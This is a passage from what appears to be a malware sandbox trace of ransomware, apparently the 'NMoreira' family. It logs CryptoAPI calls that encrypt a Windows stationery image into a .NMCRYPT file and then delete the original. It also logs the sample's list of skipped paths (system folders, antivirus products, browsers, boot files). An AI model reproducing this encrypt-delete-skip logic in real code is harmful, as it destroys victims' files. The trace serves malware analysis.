pdwDataLen=0x2d7e64c*=0x100) returned 1 [0166.392] CryptCreateHash (in: hProv=0x8e3550, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444854 | out: phHash=0x1d444854) returned 1 [0166.392] CryptHashData (hHash=0x9ad738, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0166.392] CryptDeriveKey (in: hProv=0x8e3550, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444858 | out: phKey=0x1d444858*=0x9ad2b8) returned 1 [0166.392] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0166.392] CryptSetKeyParam (hKey=0x9ad2b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0166.392] wcslen (_String="\\\\?\\") returned 0x4 [0166.392] CryptDuplicateKey (in: hKey=0x9ad2b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad1f8) returned 1 [0166.392] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0166.393] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0166.393] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=3168) returned 1 [0166.393] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0166.393] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.394] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.394] GetLastError () returned 0x0 [0166.394] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.395] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.395] GetLastError () returned 0x0 [0166.395] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.395] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.396] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.396] GetLastError () returned 0x0 [0166.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.396] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.396] GetLastError () returned 0x0 [0166.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.396] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.396] GetLastError () returned 0x0 [0166.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.396] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.396] GetLastError () returned 0x0 [0166.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.396] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.396] GetLastError () returned 0x0 [0166.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.396] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.396] GetLastError () returned 0x0 [0166.396] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.396] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.396] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.396] GetLastError () returned 0x0 [0166.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.397] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.397] GetLastError () returned 0x0 [0166.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.397] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.397] GetLastError () returned 0x0 [0166.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0166.397] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0166.397] GetLastError () returned 0x0 [0166.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0166.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x60, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x60, lpOverlapped=0x0) returned 1 [0166.397] CryptEncrypt (in: hKey=0x9ad1f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x60, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x70) returned 1 [0166.397] GetLastError () returned 0x0 [0166.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x70, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x70, lpOverlapped=0x0) returned 1 [0166.397] ReadFile (in: hFile=0x15b0, lpBuffer=0x2895990, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0166.397] WriteFile (in: hFile=0x15c4, lpBuffer=0x2895990*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2895990*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0166.398] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg")) returned 0x20 [0166.398] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg", dwFileAttributes=0x20) returned 0 [0166.398] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg") returned 1 [0166.398] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg")) returned 0 [0166.398] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg" [0166.398] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0166.398] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD8B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd8b.tmp")) returned 0xfd8b [0166.400] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD8B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd8b.tmp"), dwFlags=0x1) returned 0 [0166.400] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXFD8B.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxfd8b.tmp")) returned 1 [0166.400] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0166.400] wcslen (_String="OK") returned 0x2 [0166.400] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.400] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0166.400] CryptDestroyKey (hKey=0x9ad2b8) returned 1 [0166.400] CryptDestroyHash (hHash=0x9ad738) returned 1 [0166.400] CryptReleaseContext (hProv=0x8e3550, dwFlags=0x0) returned 1 [0166.400] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*NMCRYPT") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*Recovers your files.html") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*.exe") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*.dll") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*.lnk") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*.bat") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*.ini") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*.msi") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*.scf") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*pagefile.sys*") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*NTUSER.DAT*") returned 0 [0166.400] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*AppData*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\winrar\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\Internet Explorer\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\java\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\TeamViewer\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\windows\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\ESET\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\AVG\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\AVIRA\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*\\AVAST Software\\*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*Atheros*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*Realtek*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*bootmgr*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*boot*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*boot*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*CONFIG.SYS*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*IO.SYS*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*MSDOS.SYS*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*NTDETECT.COM*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*ntldr*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*chrome*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*opera*") returned 0 [0166.401] PathMatchSpecW (pszFile="Wrinkled_Paper.gif", pszSpec="*firefox*") returned 0 [0166.401] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Wrinkled_Paper.gif", pszSpec="*") returned 1 [0166.401] strlen (_Str="NMoreira") returned 0x8 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.401] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0166.402] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | 